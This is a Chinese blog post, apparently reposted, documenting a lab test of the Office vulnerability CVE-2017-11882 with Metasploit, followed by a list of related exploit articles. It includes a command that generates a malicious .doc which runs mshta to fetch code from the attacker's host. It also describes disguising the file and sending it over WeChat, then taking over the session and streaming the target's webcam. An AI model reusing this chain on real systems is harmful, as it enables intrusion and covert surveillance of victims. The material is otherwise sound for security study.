MSF渗透测试-CVE-2017-11882(MSOffice漏洞)

最新推荐文章于 2023-08-02 21:24:00 发布
最新推荐文章于 2023-08-02 21:24:00 发布
阅读量385 收藏 1
点赞数
文章标签: shell python 运维
原文链接:http://www.cnblogs.com/zl20154312/p/8877386.html
版权

1.测试环境

2.测试前准备

3.测试过程

—3.1虚拟机环境测试

—3.2局域网靶机测试

4.测试感想

1.测试环境

攻击机:

OS:kail

IP:192.168.15.132/192.168.137.231

靶机:

OS:Windows7

Office版本:Office2013_CN

IP:

2.测试前准备

1.下载python脚本

906866-20180418195136703-1413818369.png

2.下载MSF组件

906866-20180418195155341-1444484916.png

3.将cve_2017_11882.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目录下

906866-20180418195344287-282036989.png

4.把下载的cve_2017_11882.rtf复制到/usr/share/metasploit-framework/data/exploits/目录下

906866-20180418195457585-332311039.png

5.把Command109b_CVE-2017-11882.py复制到/root目录下

3.测试过程

3.1虚拟机环境测试

1.msfconsole执行search命令

906866-20180418195554092-744261512.png

2.设置payloadreverse_tcp,设置LHOST192.168.15.132,设置URIPATHtest(之后利用python脚本生成doc文件的时候也要使用相同路径)

906866-20180418200017020-1633142142.png

3.show options显示设置

906866-20180418200146990-1274015817.png

4.exploit -j运行

906866-20180418201549793-1620425608.png

5.另开一个terminalpython Command109b_CVE-2017-11882.py -c "mshta http://192.168.15.132:8080/test" -o kail_help.doc

906866-20180418201809382-796805619.png

6.把生成的kail_help复制到靶机中打开,是个空白文档

906866-20180418201851223-1915721984.png

7.回连成功906866-20180418201941717-1587377517.png

8.sessions -i 1接管活动会话1,shell可以看到已经成功渗透靶机

906866-20180418202017175-1220811134.png

3.2局域网靶机测试

0.更改kail网络链接模式由NAT->桥接,获得一个与靶机在同一网段下的IP192.168.137.231

1.更改一下LHOST,重新生成一个doc文件,exploit -j监听

906866-20180418202541607-1336925692.png

2.将文件改名为kail_help2.doc通过微信发给靶机(随便改啥,具有迷惑性就行)

3.靶机打开doc,Windows7防火墙处于打开状态,无杀软

906866-20180418202724905-628194459.png

4.攻击机获得回连,sessions -i 1接管

906866-20180418202750505-1563530435.png

5.webcam_stream可以直接控制摄像头进行直播

906866-20180418202858748-496139362.png

6.shell中获取靶机桌面信息

906866-20180418202937482-2134783496.png

4.测试感想

  • 前人栽树,后人乘凉。githubmeterpreter-db上有漏洞相关的msf模块python脚本可以直接使用
  • 老旧系统、软件十分不靠谱,易于攻入。其实还实践了WindowsDefender+Windows10的组合,WinodowsDefender会直接将doc文件杀掉,但是这个版本的WIN7还是应用很广的,包括Office2013可以说是学生中应用十分广泛的版本(这个Windwos镜像和office2013都是徐日老师FTP服务器上的版本,在DKY安装率应该还是很有保证的)

转载于:https://www.cnblogs.com/zl20154312/p/8877386.html

weixin_30652491
关注
MSF多种渗透测试实例合集
weixin_45380284的博客
03-05 3583
MSF多种渗透测试实例合集 声明:本文漏洞均为已发布漏洞,仅供学习实验,切勿违法使用,请自己搭建靶机进行学习。 1.(MS08-067)缓冲区溢出漏洞 漏洞简介: MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程履行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 3907
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   Meterpreter 是 Metasploit 框架中的一...
CVE-2017-11882漏洞 Msf利用复现
weixin_30918415的博客
11-23 964
中午时候收到了推送的漏洞预警,在网上搜索相关信息看到很多大牛已经开发出生成doc文档的脚本和msf的poc,本文记录CVE-2017-11882 漏洞Msf下的利用。 0x00 漏洞简介 2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞CVE-2017-11882)。该漏洞Office内存破坏...
cve-2017-11882
weixin_34397291的博客
06-23 111
2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞CVE-2017-11882)。该漏洞Office内存破坏漏洞,影响目前流行的所有Office版本。gongji者可以利用漏洞以当前登录的用户的身份执行任意命令。漏洞影响版本:Office 365Microsoft Office 2000 ...
CVE_2017_11882漏洞复现(Metasploit开启NT远程桌面添加账户)
cainsoftware的博客
07-05 280
靶机安装windows office 2016 2.rb复制文件到攻击机的msf的模块文件下并刷新 这里注意:msf放到库文件下 不能用- 只能用下划线 _ 不然刷新库 不认 3.设置参数 运行并生成 木马doc 4.运行监听 靶机执行木马 注意: 这边连接后并不会直接回显,需要用seesions –i 1的方式来链接反弹 5.开启远程桌面 run post/windows/manage/enable_rdp 6.添加远程桌面密码run pos...
CVE-2017-11882 复现
Aevery的博客
02-13 2700
CVE_2017-11882复现
Office隐藏17年的漏洞CVE_2017_11882测试记录
weixin_33676492的博客
11-25 162
Office隐藏17年的漏洞CVE_2017_11882测试记录 创建时间: 2017/11/25 0:18 作者: CN_Simo 标签: Office漏洞 参考文章1:https://www.cnblogs.com/Oran9e/p/7880832.html 参考文章2:https://www.cnblogs.co...
msf win10漏洞_CVE20200796的msf渗透
weixin_42523326的博客
01-06 1426
起始经过对靶机的扫描探测,发现靶机存在CVE-2020-0796漏洞(靶机至少分4G内存,要不会蓝屏...)Shell获取011 使用msf生成shellcodemsfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f py -o shellcode.txt 将shellcode.txt文本中内容替换exp(https...
msf win10漏洞_【CVE20200796】漏洞复现
weixin_39765697的博客
01-06 2949
一、漏洞简介该漏洞是服务器消息块3.1.1(SMBv3)协议中处理压缩消息时,对数据没有经过安全检查,直接使用会引发内存破坏,成功利用针对此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。利用针对服务器的漏洞,未经身份验证的攻击者可以将特制数据包发送到目标SMBv3服务器,若要利用针对客户端的漏洞,未经身份验证的攻击者需要配置恶意SMBv3服务器,并诱使用户连接到该服务器。二、...
Microsoft Office公式编辑器(CVE-2017-11882漏洞分析报告
12-07 1005
@[toc]文章
CVE-2017-11882利用
Jiajiajiang_的博客
06-20 1129
利用kail的msf进行攻击, 首先打开kali,查看 IP,可以看到我的虚拟机kali的 IP是192.168.3.116。把Command43b_CVE-2017-11882.py下载下来放kali的桌面就可以。接下来就要把PS_shell.rb文件下载下来。就把PS_shell.rb和ms17-010.rb放一起吧。 所有用到的资源:链接:https://pan.baidu.com/s/...
CVE-2010-3333 Microsoft RTF栈溢出漏洞分析
weixin_50287973的博客
08-25 933
参考:《漏洞战争》 漏洞描述 Microsoft Office XP SP3,Office 2003 SP3,Office 2007 SP2,Office 2010等多个版本的Office软件中的Open XML文件格式转换器存在栈溢出漏洞,主要是在处理RTF中的“pFragments”属性时存在栈溢出,导致远程攻击者可以借助特制的RTF数据执行任意代码,因此该漏洞又名“RTF栈缓冲区溢出漏洞”。 分析环境 所用环境 操作系统 windows xp sp3 调试器 windbg 漏
Office CVE-2017-11882本地复现
Jun_ay的博客
11-22 3950
Office CVE-2017-11882本地复现 这两天,office又出名了,CVE-2017-11882成了圈里关注的热点,今年office爆出好几个漏洞,从CVE-2017-0199、CVE-2017-8570到现在的CVE-2017-11882,exp也是越来越简单粗暴。 下面,我也来蹭波热度。Step1:万年计算器POCPOC GitHub:可以使用国外出现的第一份poc:https
off CVE-2017-11882漏洞复现
weixin_44664530的博客
04-22 352
CVE-2017-11882漏洞影响版本 office 2003 office 2007 office 2010 office 2013 office 2016 复现环境 win7 kali office 2016 office2016分享链接:https://pan.baidu.com/s/15YrwY7_1OOFSgpsleS2O5A 提取码:d1lo 下载组件 下载 https://gith...
[漏洞样本分析]CVE-2017-11882
r250414958的博客
11-01 3396
环境: Win7(专业版) office 2003 sp3(完全版) 工具: Ollydbg IDA Pro PEid Kali-Linux metasploit POC来源: https://github.com/embedi/CVE-2017-11882 漏洞介绍: 安全公司Embedi最早报告了漏洞,他们在一个老旧的微软工具Equation Editor中的EQNEDT32...
CVE-2017-11882漏洞复现过程中遇到的一些小问题
weixin_44375751的博客
01-24 3836
一、实验环境 靶机:Windows7 office2003 IP:192.168.87.129 渗透机:Kali Linux 2021.4a IP:192.168.87.130 问题1:安装的office2003中插入-对象中没有Microsoft 公式 3.0 解决方法:工具-自定义-命令 类别“插入”中找到命令“公式编辑器” 将其拖到工具栏中,点击图标,提示该功能尚未安装,点击是进行安装。 二、使用POC代码生成word文件 root@kali:~/Desktop/CV...
cve-2017-11882漏洞利用
weixin_34112030的博客
11-25 257
概述 这是一个潜伏了17年之久的远程代码执行漏洞,这个漏洞影响了目前所有的流行office软件,原理是利用了office的一个EQNEDT32.EXE组件,就是公式编辑器组件,详细的你可以看freebuf的这篇文章打开文档变肉鸡:潜伏17年的“噩梦公式”Office漏洞攻击分析 我们现在说攻击 操作 首先下载metasp...
CVE-2017-11882 利用
周公子的博客
01-01 2926
这个漏洞出来很久了,据说通杀以下版本的Office:MicrosoftOffice 2000MicrosoftOffice 2003MicrosoftOffice 2007 Service Pack 3MicrosoftOffice 2010 Service Pack 2MicrosoftOffice 2013 Service Pack 1MicrosoftOffice 2016Microsoft
Windows的用户和组及ARP断网攻击
最新发布
来日可期的博客
08-02 896
在局域网中,主机通信前必须通过ARP协议把IP地址转换为MAC地址,ARP欺骗就是通过伪造IP地址与MAC地址的映射关系实现的一种欺骗攻击。
Metasploit渗透测试教程:利用MS12-004漏洞
"这篇教程介绍了如何使用Backtrack5中的Metasploit Framework进行渗透测试,特别是针对MS12-004漏洞的利用。Metasploit是一个开源的安全测试平台,允许安全专家模拟攻击来评估系统的安全性。本文适用于网络安全爱好...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值